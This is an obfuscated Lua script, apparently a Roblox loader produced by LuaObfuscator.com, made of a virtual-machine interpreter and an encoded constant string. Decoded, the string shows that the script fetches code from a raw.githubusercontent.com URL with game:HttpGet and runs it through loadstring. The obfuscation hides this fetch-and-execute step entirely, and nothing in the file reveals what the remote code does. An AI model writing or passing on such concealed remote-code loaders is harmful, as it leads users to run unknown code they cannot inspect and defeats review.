--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v117=0;local v118;while true do if (v117==1) then return v118;end if (v117==0) then v118=v5(v86,v19);v19=nil;v117=1;end end else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=0 -0 ;local v88;while true do if (v87==0) then v88=(v31/((5 -3)^(v32-(1 -(0 -0)))))%(((1069 -(68 + 997)) -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -((2127 -(226 + 1044)) + 74)))) + (569 -(367 + 201)))) ;return v88-(v88%(928 -(214 + (3104 -2391)))) ;end end else local v89=0 + (117 -(32 + 85)) ;local v90;while true do if (v89==(0 + 0 + 0)) then v90=(879 -(282 + 595))^(v32-(1638 -(1523 + 114))) ;return (((v31%(v90 + v90))>=v90) and (1 + 0)) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==(957 -(892 + 65))) then v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (4 -(2 + 0)) ;v35=1 -(0 -0) ;end if (v35==(1 + 0)) then return (v37 * (436 -(67 + 113))) + v36 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 4 ;return (v41 * (66680831 -49903615)) + (v40 * (66488 -(802 + 150))) + (v39 * (689 -433)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,1 -0 ,15 + 5 ) * ((999 -(915 + 36 + 46))^(90 -58))) + v42 ;local v46=v20(v43,13 + 8 ,40 -9 );local v47=((v20(v43,(1657 -(145 + 293)) -(1069 + 118) )==1) and  -(2 -(1 -0))) or (1 -0) ;if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * 0 ;else v46=1 + 0 ;v44=791 -((798 -(44 + 386)) + 423) ;end elseif (v46==(6433 -4386)) then return ((v45==(18 -(10 + 8))) and (v47 * (1/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2509 -(998 + 488)) ) * (v44 + (v45/(((142 + 302) -(416 + 26))^(165 -(93 + 20))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(772 -(201 + 571))) then return "";end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v67=1139 -(116 + 1022) , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v91~= #"[") then else if (v92== #"}") then v93=(function() return v94()~=0 ;end)();elseif (v92==2) then v93=(function() return v95();end)();elseif (v92~= #"xnx") then else v93=(function() return v96();end)();end v97[v98]=(function() return v93;end)();break;end if (v91==0) then local v124=(function() return 0;end)();while true do if ((651 -(494 + 157))~=v124) then else v92=(function() return v94();end)();v93=(function() return nil;end)();v124=(function() return 1;end)();end if (v124==1) then v91=(function() return  #"]";end)();break;end end end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v52=(function() return function(v99,v100,v101,v102,v103,v104,v105,v106,v107) local v108=(function() return 0;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do if (v108==0) then local v125=(function() return 0;end)();local v126=(function() return;end)();while true do if (v125~=0) then else v126=(function() return 0 -0 ;end)();while true do if (v126==(0 + 0)) then v99=(function() return 0 + 0 ;end)();v100=(function() return nil;end)();v126=(function() return 1 + 0 ;end)();end if (v126==(837 -(660 + 176))) then v108=(function() return 1 + 0 ;end)();break;end end break;end end end if (v108==(203 -(14 + 188))) then local v127=(function() return 675 -(534 + 141) ;end)();while true do if ((0 + 0)~=v127) then else while true do if (v99==0) then v100=(function() return v101();end)();if (v102(v100, #"\\", #",")~=(0 + 0)) then else local v176=(function() return 0 + 0 ;end)();local v177=(function() return;end)();local v178=(function() return;end)();local v179=(function() return;end)();while true do if (v176==(3 -1)) then if (v102(v178, #"[", #"\\")~= #",") then else v179[2]=(function() return v105[v179[2 -0 ]];end)();end if (v102(v178,5 -3 ,2 + 0 )~= #"|") then else v179[ #"xnx"]=(function() return v105[v179[ #"91("]];end)();end v176=(function() return 2 + 1 ;end)();end if (v176~=3) then else if (v102(v178, #"asd", #"xxx")~= #"~") then else v179[ #"0313"]=(function() return v105[v179[ #".dev"]];end)();end v106[v107]=(function() return v179;end)();break;end if (v176==1) then local v186=(function() return 0;end)();while true do if (v186==1) then v176=(function() return 2;end)();break;end if (v186==0) then local v191=(function() return 396 -(115 + 281) ;end)();while true do if (v191==0) then v179=(function() return {v103(),v103(),nil,nil};end)();if (v177==(0 + 0)) then local v192=(function() return 0;end)();local v193=(function() return;end)();while true do if ((0 -0)~=v192) then else v193=(function() return 0;end)();while true do if (v193==0) then v179[ #"91("]=(function() return v103();end)();v179[ #".dev"]=(function() return v103();end)();break;end end break;end end elseif (v177== #"{") then v179[ #"asd"]=(function() return v104();end)();elseif (v177==(7 -5)) then v179[ #"xxx"]=(function() return v104() -((869 -(550 + 317))^(22 -6)) ;end)();elseif (v177== #"-19") then local v198=(function() return 0 -0 ;end)();local v199=(function() return;end)();while true do if (v198~=0) then else v199=(function() return 0;end)();while true do if (v199~=(0 -0)) then else v179[ #"91("]=(function() return v104() -(2^16) ;end)();v179[ #".com"]=(function() return v103();end)();break;end end break;end end end v191=(function() return 286 -(134 + 151) ;end)();end if (v191==1) then v186=(function() return 1;end)();break;end end end end end if ((1665 -(970 + 695))==v176) then v177=(function() return v102(v100,2, #"91(");end)();v178=(function() return v102(v100, #"xnxx",11 -5 );end)();v176=(function() return 1991 -(582 + 1408) ;end)();end end end break;end end return v99,v100,v101,v102,v103,v104,v105,v106,v107;end end end end end;end)();local v53=(function() return function(v109,v110,v111) local v112=(function() return 0;end)();local v113=(function() return;end)();while true do if ((0 -0)~=v112) then else v113=(function() return 0 -0 ;end)();while true do if (v113==(0 -0)) then local v128=(function() return 0;end)();local v129=(function() return;end)();while true do if (v128~=(1824 -(1195 + 629))) then else v129=(function() return 0 -0 ;end)();while true do if (v129==0) then local v181=(function() return 0;end)();while true do if (v181==(241 -(187 + 54))) then v109[v110-#"." ]=(function() return v111();end)();return v109,v110,v111;end end end end break;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"|",v58 do FlatIdent_24A02,Type,Cons,v21,v24,v25,v59,v69=(function() return v51(FlatIdent_24A02,Type,Cons,v21,v24,v25,v59,v69);end)();end v57[ #"asd"]=(function() return v21();end)();for v70= #"[",v23() do FlatIdent_89ECE,Descriptor,v21,v20,v22,v23,v59,v54,v70=(function() return v52(FlatIdent_89ECE,Descriptor,v21,v20,v22,v23,v59,v54,v70);end)();end for v71= #",",v23() do v55,v71,v28=(function() return v53(v55,v71,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[(1365 -(57 + 527)) -(162 + 618) ];local v65=v61[2 + 0 ];local v66=v61[3];return function(...) local v72=v64;local v73=v65;local v74=v66;local v75=v27;local v76=1 + 0 ;local v77= -(1 -0);local v78={};local v79={...};local v80=v12("#",...) -(1 + 0) ;local v81={};local v82={};for v114=1636 -(1373 + 263) ,v80 do if (v114>=v74) then v78[v114-v74 ]=v79[v114 + (1001 -(451 + 549)) ];else v82[v114]=v79[v114 + (104 -(17 + 86)) + 0 ];end end local v83=(v80-v74) + (1 -(0 + 0)) ;local v84;local v85;while true do v84=v72[v76];v85=v84[1 -(0 -0) ];if (v85<=(1387 -(746 + 638))) then if (v85<=((2 -1) + 0)) then if ((786<3023) and (v85==(0 -0))) then v82[v84[343 -(218 + 123) ]]();else local v130=0;local v131;local v132;while true do if ((v130==((1747 -(122 + 44)) -(1535 + 46))) or (2442<74)) then v131=v84[2 + 0 ];v132=v82[v84[1 + 2 ]];v130=561 -(306 + 254) ;end if (v130==1) then v82[v131 + (1 -0) + 0 ]=v132;v82[v131]=v132[v84[7 -3 ]];break;end end end elseif (v85>(1469 -(899 + 568))) then v82[v84[2 + 0 ]]=v84[7 -4 ];else local v135;local v136,v137;local v138;local v139;v82[v84[2]]={};v76=v76 + 1 ;v84=v72[v76];v82[v84[605 -(268 + 335) ]]=v63[v84[(971 -678) -(60 + 230) ]];v76=v76 + (573 -(426 + 146)) ;v84=v72[v76];v82[v84[1 + 1 ]]=v63[v84[1459 -(282 + 1174) ]];v76=v76 + (812 -(569 + 197 + 45)) ;v84=v72[v76];v139=v84[2];v138=v82[v84[8 -5 ]];v82[v139 + 1 ]=v138;v82[v139]=v138[v84[4]];v76=v76 + 1 + 0 + 0 ;v84=v72[v76];v82[v84[1026 -(706 + 318) ]]=v84[1254 -(721 + 530) ];v76=v76 + (1272 -((1914 -969) + 326)) ;v84=v72[v76];v139=v84[67 -(30 + 35) ];v136,v137=v75(v82[v139](v13(v82,v139 + (2 -1) ,v84[3 + 0 ])));v77=(v137 + v139) -(701 -(271 + 429)) ;v135=0 + 0 ;for v158=v139,v77 do local v159=0;while true do if (v159==((1031 + 469) -(1408 + 92))) then v135=v135 + (1087 -(461 + 625)) ;v82[v158]=v136[v135];break;end end end v76=v76 + (1289 -(993 + 295)) ;v84=v72[v76];v139=v84[(1258 -(1043 + 214)) + 1 ];v82[v139]=v82[v139](v13(v82,v139 + (1172 -(418 + 753)) ,v77));v76=v76 + 1 + (0 -0) ;v84=v72[v76];v82[v84[1 + 1 ]]();v76=v76 + 1 + 0 ;v84=v72[v76];do return;end end elseif (v85<=5) then if (v85==4) then do return;end else local v155=0 + 0 ;local v156;while true do if (v155==(529 -(406 + 123))) then v156=v84[1771 -(1749 + 20) ];v82[v156]=v82[v156](v13(v82,v156 + (1213 -(323 + 889)) + 0 ,v77));break;end end end elseif (v85<=6) then v82[v84[1324 -(1249 + 73) ]]={};elseif (v85==(3 + 4)) then v82[v84[1147 -(466 + 679) ]]=v63[v84[6 -3 ]];else local v162=0;local v163;local v164;local v165;local v166;while true do if ((4535==4535) and (v162==(5 -3))) then for v182=v163,v77 do v166=v166 + 1 ;v82[v182]=v164[v166];end break;end if ((v162==(1901 -(106 + 1794))) or (3009<=2105)) then v77=(v165 + v163) -(1 + 0) ;v166=(0 -0) + (580 -(361 + 219)) ;v162=2;end if ((1830<3669) and (v162==0)) then v163=v84[2];v164,v165=v75(v82[v163](v13(v82,v163 + (2 -1) ,v84[7 -4 ])));v162=115 -(4 + 110) ;end end end v76=v76 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034B3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6E39776D77643779637A2D63727970746F2F2D2F726566732F68656164732F6D61696E2F436865636B00094Q00027Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
